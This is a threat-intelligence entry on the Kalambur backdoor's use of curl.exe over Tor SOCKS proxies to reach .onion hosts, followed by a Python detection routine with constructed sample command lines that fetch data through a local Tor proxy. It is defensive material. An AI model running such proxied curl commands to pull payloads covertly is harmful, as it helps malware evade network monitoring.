Kalambur backdoor curl tor socks proxy execution

Intel Name: Kalambur backdoor curl tor socks proxy execution

Date of Scan: February 18, 2025

Impact: Medium

Summary:
“Kalambur Backdoor Curl TOR SOCKS Proxy Execution” refers to a technique used by the Kalambur backdoor malware, in which it runs “curl.exe” to connect to remote servers through TOR using SOCKS proxies. This behavior typically involves accessing “.onion” domains, which are often used for anonymized communication. Such activity is indicative of malicious actions, as the malware uses these techniques to hide its communication and evade detection.
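
One way to express this behaviour as detection logic over process-creation events (an added example, not part of the original intel entry or any vendor rule). The `Image` and `CommandLine` field names, the proxy addresses and the `.onion` host are constructed placeholders.

```python
import re

# curl options and proxy URL schemes that send traffic through a SOCKS proxy.
SOCKS_RE = re.compile(r"(?i)(--socks(?:4a?|5(?:-hostname)?)\b|\bsocks(?:4a?|5h?)://)")
# Any Tor hidden-service hostname in the arguments.
ONION_RE = re.compile(r"(?i)\.onion\b")
# Process image is curl or curl.exe, with or without a directory prefix.
CURL_RE = re.compile(r"(?i)(?:^|[\\/])curl(?:\.exe)?$")


def is_suspicious(image, command_line):
    """True when curl is launched with a SOCKS proxy and a .onion target."""
    if not CURL_RE.search(image.strip().strip('"')):
        return False
    return bool(SOCKS_RE.search(command_line) and ONION_RE.search(command_line))


def scan(events):
    """Return the indexes of events that match the behaviour."""
    return [i for i, e in enumerate(events)
            if is_suspicious(e["Image"], e["CommandLine"])]


# Constructed sample events (not real telemetry); the .onion host is a placeholder.
ONION = "placeholderonionhostforexample.onion"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": f"curl.exe -s --socks5-hostname 127.0.0.1:9050 http://{ONION}/"},
    {"Image": r"C:\Users\Public\curl.exe",
     "CommandLine": f"curl.exe -x socks5h://127.0.0.1:9050 http://{ONION}/data -o out.bin"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -O https://example.com/file.zip"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe --socks5 10.0.0.5:1080 https://example.com/"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": f"notepad.exe notes-about-socks5h://-and-{ONION}.txt"},
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print("ALERT:", SAMPLE_EVENTS[i]["CommandLine"])
```

Requiring both the SOCKS indicator and the `.onion` target keeps ordinary curl use behind a SOCKS proxy from alerting.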
